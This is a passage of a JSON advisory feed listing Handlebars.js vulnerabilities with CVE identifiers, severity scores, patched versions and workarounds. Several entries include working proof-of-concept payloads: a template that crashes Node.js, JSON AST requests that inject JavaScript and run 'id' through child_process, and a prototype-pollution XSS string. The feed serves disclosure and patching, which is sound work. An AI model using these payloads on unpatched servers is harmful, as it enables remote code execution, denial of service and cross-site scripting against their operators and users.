user-controlled.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-27T18:21:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33940","https://github.com/advisories/GHSA-xhpv-hc6g-r9c6"],"source_kind":"github","identifiers":["GHSA-xhpv-hc6g-r9c6","CVE-2026-33940"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-07-04T20:01:53.416Z","epss_percentage":0.00703,"epss_percentile":0.48764,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aHB2LWhjNmctcjljNs4ABUYs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14aHB2LWhjNmctcjljNs4ABUYs","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aHB2LWhjNmctcjljNs4ABUYs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05Y3g2LTM3cG0tOWpmZs4ABUYr","url":"https://github.com/advisories/GHSA-9cx6-37pm-9jff","title":"Handlebars.js has Denial of Service via Malformed Decorator Syntax in Template Compilation","description":"## Summary\n\nWhen a Handlebars template contains decorator syntax referencing an unregistered decorator (e.g. `{{*n}}`), the compiled template calls `lookupProperty(decorators, \"n\")`, which returns `undefined`. The runtime then immediately invokes the result as a function, causing an unhandled `TypeError: ... is not a function` that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a `try/catch` is vulnerable to a single-request Denial of Service.\n\n## Description\n\nIn `lib/handlebars/compiler/javascript-compiler.js`, the code generated for a decorator invocation looks like:\n\n```javascript\nfn = lookupProperty(decorators, \"n\")(fn, props, container, options) || fn;\n```\n\nWhen `\"n\"` is not a registered decorator, `lookupProperty(decorators, \"n\")` returns `undefined`. The expression immediately attempts to call `undefined` as a function, producing:\n\n```\nTypeError: lookupProperty(...) is not a function\n```\n\nBecause the error is thrown inside the compiled template function and is not caught by the runtime, it propagates up as an unhandled exception and — when not caught by the application — crashes the Node.js process.\n\nThis inconsistency is notable: references to unregistered **helpers** produce a clean `\"Missing helper: ...\"` error, while references to unregistered **decorators** cause a hard crash.\n\n**Attack scenario:** An attacker submits `{{*n}}` as template content to any endpoint that calls `Handlebars.compile(userInput)()`. Each request crashes the server process; with process managers that auto-restart (PM2, systemd), repeated submissions create a persistent DoS.\n\n## Proof of Concept\n\n```javascript\nconst Handlebars = require('handlebars'); // Handlebars 4.7.8, Node.js v22.x\n\n// Any of these payloads crash the process\nHandlebars.compile('{{*n}}')({});\nHandlebars.compile('{{*decorator}}')({});\nHandlebars.compile('{{*constructor}}')({});\n```\n\nExpected crash output:\n```\nTypeError: lookupProperty(...) is not a function\n    at Function.eval [as decorator] (eval at compile (...javascript-compiler.js:134:36))\n```\n\n## Workarounds\n\n- **Wrap compilation and rendering in `try/catch`:**\n  ```javascript\n  try {\n    const result = Handlebars.compile(userInput)(context);\n    res.send(result);\n  } catch (err) {\n    res.status(400).send('Invalid template');\n  }\n  ```\n- **Validate template input** before passing it to `compile()`. Reject templates containing  decorator syntax (`{{*...}}`) if decorators are not used in your application.\n- **Use the pre-compilation workflow:** compile templates at build time and serve only pre-compiled  templates; do not call `compile()` at request time.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-27T18:21:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33939","https://github.com/advisories/GHSA-9cx6-37pm-9jff"],"source_kind":"github","identifiers":["GHSA-9cx6-37pm-9jff","CVE-2026-33939"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-07-19T12:02:11.163Z","epss_percentage":0.00616,"epss_percentile":0.45506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Y3g2LTM3cG0tOWpmZs4ABUYr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05Y3g2LTM3cG0tOWpmZs4ABUYr","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Y3g2LTM3cG0tOWpmZs4ABUYr/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zbWZtLTgzeGYtYzkycs4ABUYq","url":"https://github.com/advisories/GHSA-3mfm-83xf-c92r","title":"Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block","description":"## Summary\n\nThe `@partial-block` special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. When a helper overwrites `@partial-block` with a crafted Handlebars AST, a subsequent invocation of `{{\u003e @partial-block}}` compiles and executes that AST, enabling arbitrary JavaScript execution on the server.\n\n## Description\n\nHandlebars stores `@partial-block` in the `data` frame that is accessible to templates. In nested contexts, a parent frame's `@partial-block` is reachable as `@_parent.partial-block`. Because the data frame is a mutable object, any registered helper that accepts an object reference and assigns properties to it can overwrite `@partial-block` with an attacker-controlled value.\n\nWhen `{{\u003e @partial-block}}` is subsequently evaluated, `invokePartial` receives the crafted object. The runtime, finding an object that is not a compiled function, falls back to **dynamically compiling** the value via `env.compile()`. If that value is a well-formed Handlebars AST containing injected code, the injected JavaScript runs in the server process.\n\nThe `handlebars-helpers` npm package (commonly used with Handlebars) includes several helpers such as `merge` that can be used as the mutation primitive.\n\n## Proof of Concept\n\nTested with Handlebars 4.7.8 and `handlebars-helpers`:\n\n```javascript\nconst Handlebars = require('handlebars');\nconst merge = require('handlebars-helpers').object().merge;\nHandlebars.registerHelper('merge', merge);\n\nconst vulnerableTemplate = `\n{{#*inline \"myPartial\"}}\n    {{\u003e@partial-block}}\n    {{\u003e@partial-block}}\n{{/inline}}\n{{#\u003emyPartial}}\n    {{merge @_parent partial-block=1}}\n    {{merge @_parent partial-block=payload}}\n{{/myPartial}}\n`;\n\nconst maliciousContext = {\n  payload: {\n    type: \"Program\",\n    body: [\n      {\n        type: \"MustacheStatement\",\n        depth: 0,\n        path: {\n          type: \"PathExpression\",\n          parts: [\"pop\"],\n          original: \"this.pop\",\n          // Code injected via depth field — breaks out of generated function call\n          depth: \"0])),function () {console.error('VULNERABLE: RCE via @partial-block');}()));//\",\n        },\n      },\n    ],\n  },\n};\n\nHandlebars.compile(vulnerableTemplate)(maliciousContext);\n// Prints: VULNERABLE: RCE via @partial-block\n```\n\n## Workarounds\n\n- **Use the runtime-only build** (`require('handlebars/runtime')`). The `compile()` method is  absent, eliminating the vulnerable fallback path.\n- **Audit registered helpers** for any that write arbitrary values to context objects. Helpers  should treat context data as read-only.\n- **Avoid registering helpers** from third-party packages (such as `handlebars-helpers`) in  contexts where templates or context data can be influenced by untrusted input.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-27T18:20:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33938","https://github.com/advisories/GHSA-3mfm-83xf-c92r"],"source_kind":"github","identifiers":["GHSA-3mfm-83xf-c92r","CVE-2026-33938"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-07-04T20:01:53.417Z","epss_percentage":0.00709,"epss_percentile":0.48971,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zbWZtLTgzeGYtYzkycs4ABUYq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zbWZtLTgzeGYtYzkycs4ABUYq","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zbWZtLTgzeGYtYzkycs4ABUYq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ydzZ3LTY3NHEtNGM0cc4ABUYp","url":"https://github.com/advisories/GHSA-2w6w-674q-4c4q","title":"Handlebars.js has JavaScript Injection via AST Type Confusion","description":"## Summary\n\n`Handlebars.compile()` accepts a pre-parsed AST object in addition to a template string. The `value` field of a `NumberLiteral` AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to `compile()` can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.\n\n## Description\n\n`Handlebars.compile()` accepts either a template string or a pre-parsed AST. When an AST is supplied, the JavaScript code generator in `lib/handlebars/compiler/javascript-compiler.js` emits `NumberLiteral` values verbatim:\n\n```javascript\n// Simplified representation of the vulnerable code path:\n// NumberLiteral.value is appended to the generated code without escaping\ncompiledCode += numberLiteralNode.value;\n```\n\nBecause the value is not wrapped in quotes or otherwise sanitized, passing a string such as `{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //` as the `value` of a `NumberLiteral` causes the generated `eval`-ed code to break out of its intended context and execute arbitrary commands.\n\nAny endpoint that deserializes user-controlled JSON and passes the result directly to `Handlebars.compile()` is exploitable.\n\n## Proof of Concept\n\nServer-side Express application that passes `req.body.text` to `Handlebars.compile()`:\n\n\n```Javascript\nimport express from \"express\";\nimport Handlebars from \"handlebars\";\n\nconst app = express();\napp.use(express.json());\n\napp.post(\"/api/render\", (req, res) =\u003e {\n  let text = req.body.text;\n  let template = Handlebars.compile(text);\n  let result = template();\n  res.send(result);\n});\n\napp.listen(2123);\n```\n\n```\nPOST /api/render HTTP/1.1\nContent-Type: application/json\nHost: 127.0.0.1:2123\n\n{\n  \"text\": {\n    \"type\": \"Program\",\n    \"body\": [\n      {\n        \"type\": \"MustacheStatement\",\n        \"path\": {\n          \"type\": \"PathExpression\",\n          \"data\": false,\n          \"depth\": 0,\n          \"parts\": [\"lookup\"],\n          \"original\": \"lookup\",\n          \"loc\": null\n        },\n        \"params\": [\n          {\n            \"type\": \"PathExpression\",\n            \"data\": false,\n            \"depth\": 0,\n            \"parts\": [],\n            \"original\": \"this\",\n            \"loc\": null\n          },\n          {\n            \"type\": \"NumberLiteral\",\n            \"value\": \"{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //\",\n            \"original\": 1,\n            \"loc\": null\n          }\n        ],\n        \"escaped\": true,\n        \"strip\": { \"open\": false, \"close\": false },\n        \"loc\": null\n      }\n    ]\n  }\n}\n```\n\nThe response body will contain the output of the `id` command executed on the server.\n\n## Workarounds\n\n- **Validate input type** before calling `Handlebars.compile()`: ensure the argument is always a  `string`, never a plain object or JSON-deserialized value.\n  ```javascript\n  if (typeof templateInput !== 'string') {\n    throw new TypeError('Template must be a string');\n  }\n  ```\n- Use the Handlebars **runtime-only** build (`handlebars/runtime`) on the server if templates are  pre-compiled at build time; `compile()` will be unavailable.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-27T18:19:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33937","https://github.com/advisories/GHSA-2w6w-674q-4c4q"],"source_kind":"github","identifiers":["GHSA-2w6w-674q-4c4q","CVE-2026-33937"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-07-04T20:01:53.417Z","epss_percentage":0.0178,"epss_percentile":0.7555,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ydzZ3LTY3NHEtNGM0cc4ABUYp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ydzZ3LTY3NHEtNGM0cc4ABUYp","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ydzZ3LTY3NHEtNGM0cc4ABUYp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ycXZxLXJqd2otZ3Z3Oc4ABUWg","url":"https://github.com/advisories/GHSA-2qvq-rjwj-gvw9","title":"Handlebars.js has Prototype Pollution Leading to XSS through Partial Template Injection","description":"## Summary\n\n`resolvePartial()` in the Handlebars runtime resolves partial names via a plain property lookup on `options.partials` without guarding against prototype-chain traversal. When `Object.prototype` has been polluted with a string value whose key matches a partial reference in a template, the polluted string is used as the partial body and rendered **without HTML escaping**, resulting in reflected or stored XSS.\n\n## Description\n\nThe root cause is in `lib/handlebars/runtime.js` inside `resolvePartial()` and `invokePartial()`:\n\n```javascript\n// Vulnerable: plain bracket access traverses Object.prototype\npartial = options.partials[options.name];\n```\n\n`hasOwnProperty` is never checked, so if `Object.prototype` has been seeded with a key whose name matches a partial reference in the template (e.g. `widget`), the lookup succeeds and the polluted string is returned. The runtime emits a prototype-access warning, but the partial is still resolved and its content is inserted into the rendered output unescaped. This contradicts the documented security model and is distinct from CVE-2021-23369 and CVE-2021-23383, which addressed data property access rather than partial template resolution.\n\n**Prerequisites for exploitation:**\n1. The target application must be vulnerable to prototype pollution (e.g. via `qs`, `minimist`, or\n   any querystring/JSON merge sink).\n2. The attacker must know or guess the name of a partial reference used in a template.\n\n## Proof of Concept\n\n```javascript\nconst Handlebars = require('handlebars');\n\n// Step 1: Prototype pollution (via qs, minimist, or another vector)\nObject.prototype.widget = '\u003cimg src=x onerror=\"alert(document.domain)\"\u003e';\n\n// Step 2: Normal template that references a partial\nconst template = Handlebars.compile('\u003cdiv\u003eWelcome! {{\u003e widget}}\u003c/div\u003e');\n\n// Step 3: Render — XSS payload injected unescaped\nconst output = template({});\n// Output: \u003cdiv\u003eWelcome! \u003cimg src=x onerror=\"alert(document.domain)\"\u003e\u003c/div\u003e\n```\n\n\u003e The runtime prints a prototype access warning claiming \"access has been denied,\" but the partial still resolves and returns the polluted value.\n\n## Workarounds\n\n- Apply `Object.freeze(Object.prototype)` early in application startup to prevent prototype  pollution. Note: this may break other libraries.\n- Use the Handlebars runtime-only build (`handlebars/runtime`), which does not compile templates  and reduces the attack surface.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-26T22:20:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9","https://nvd.nist.gov/vuln/detail/CVE-2021-23369","https://nvd.nist.gov/vuln/detail/CVE-2021-23383","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33916","https://github.com/advisories/GHSA-2qvq-rjwj-gvw9"],"source_kind":"github","identifiers":["GHSA-2qvq-rjwj-gvw9","CVE-2026-33916"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-26T23:00:10.996Z","updated_at":"2026-07-19T12:02:11.180Z","epss_percentage":0.00276,"epss_percentile":0.19513,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycXZxLXJqd2otZ3Z3Oc4ABUWg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ycXZxLXJqd2otZ3Z3Oc4ABUWg","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.7.9"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycXZxLXJqd2otZ3Z3Oc4ABUWg/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTc2NWgtcWp4di01ZjQ0","url":"https://github.com/advisories/GHSA-765h-qjxv-5f44","title":"Prototype Pollution in handlebars","description":"The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-02-10T23:51:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-23383","https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1279031","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1279032","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1279030","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1279029","https://www.npmjs.com/package/handlebars","https://security.netapp.com/advisory/ntap-20210618-0007/","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/handlebars-source/CVE-2021-23383.yml","https://github.com/advisories/GHSA-765h-qjxv-5f44"],"source_kind":"github","identifiers":["GHSA-765h-qjxv-5f44","CVE-2021-23383"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:13:02.016Z","updated_at":"2026-06-20T04:04:15.103Z","epss_percentage":0.04506,"epss_percentile":0.90282,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTc2NWgtcWp4di01ZjQ0","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTc2NWgtcWp4di01ZjQ0","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTc2NWgtcWp4di01ZjQ0/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYyZ3ItNHFwOS1oOThm","url":"https://github.com/advisories/GHSA-62gr-4qp9-h98f","title":"Regular Expression Denial of Service in Handlebars","description":"Handlebars before 4.4.5 allows Regular Expression Denial of Service (ReDoS) because of eager matching. The parser may be forced into an endless loop while processing crafted templates. This may allow attackers to exhaust system resources.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-10T20:38:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2019-20922","https://github.com/handlebars-lang/handlebars.js/commit/8d5530ee2c3ea9f0aee3fde310b9f36887d00b8b","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-480388","https://www.npmjs.com/advisories/1300","https://www.npmjs.com/package/handlebars","https://github.com/advisories/GHSA-62gr-4qp9-h98f"],"source_kind":"github","identifiers":["GHSA-62gr-4qp9-h98f","CVE-2019-20922"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:13:06.322Z","updated_at":"2026-06-26T12:07:24.198Z","epss_percentage":0.03793,"epss_percentile":0.8862,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYyZ3ItNHFwOS1oOThm","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYyZ3ItNHFwOS1oOThm","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.4.5","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.4.5"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYyZ3ItNHFwOS1oOThm/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNjcXItNThybS01N2Y4","url":"https://github.com/advisories/GHSA-3cqr-58rm-57f8","title":"Arbitrary Code Execution in Handlebars","description":"Handlebars before 3.0.8 and 4.x before 4.5.3 is vulnerable to Arbitrary Code Execution. The lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript. This can be used to run arbitrary code on a server processing Handlebars templates or in a victim's browser (effectively serving as XSS).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-10T20:38:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L","references":["https://nvd.nist.gov/vuln/detail/CVE-2019-20920","https://github.com/handlebars-lang/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-534478","https://www.npmjs.com/advisories/1316","https://www.npmjs.com/advisories/1324","https://www.npmjs.com/package/handlebars","https://github.com/handlebars-lang/handlebars.js/commit/156061eb7707575293613d7fdf90e2bdaac029ee","https://github.com/advisories/GHSA-3cqr-58rm-57f8"],"source_kind":"github","identifiers":["GHSA-3cqr-58rm-57f8","CVE-2019-20920"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:13:06.313Z","updated_at":"2026-07-09T20:07:53.504Z","epss_percentage":0.03193,"epss_percentile":0.86502,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNjcXItNThybS01N2Y4","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNjcXItNThybS01N2Y4","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.5.3","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.5.3"},{"first_patched_version":"3.0.8","vulnerable_version_range":"\u003c 3.0.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNjcXItNThybS01N2Y4/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","url":"https://github.com/advisories/GHSA-f2jv-r9rf-7988","title":"Remote code execution in handlebars when compiling templates","description":"The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2021-05-06T15:57:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-23369","https://github.com/handlebars-lang/handlebars.js/commit/b6d3de7123eebba603e321f04afdbae608e8fea8","https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074950","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074951","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074952","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767","https://security.netapp.com/advisory/ntap-20210604-0008/","https://github.com/advisories/GHSA-f2jv-r9rf-7988"],"source_kind":"github","identifiers":["GHSA-f2jv-r9rf-7988","CVE-2021-23369"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:11:56.348Z","updated_at":"2026-07-14T18:08:05.617Z","epss_percentage":0.07028,"epss_percentile":0.93353,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","packages":[{"ecosystem":"maven","package_name":"org.webjars.bowergithub.wycats:handlebars.js","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"maven","package_name":"org.webjars.npm:handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"maven","package_name":"org.webjars:handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyYzYtYzZwbS1nM2do","url":"https://github.com/advisories/GHSA-q2c6-c6pm-g3gh","title":"Arbitrary Code Execution in handlebars","description":"Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.3 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-09-04T15:07:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://www.npmjs.com/advisories/1324","https://github.com/advisories/GHSA-q2c6-c6pm-g3gh"],"source_kind":"github","identifiers":["GHSA-q2c6-c6pm-g3gh"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:15.480Z","updated_at":"2026-07-22T12:14:50.600Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyYzYtYzZwbS1nM2do","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyYzYtYzZwbS1nM2do","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.5.3","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.5.3"},{"first_patched_version":"3.0.8","vulnerable_version_range":"\u003c 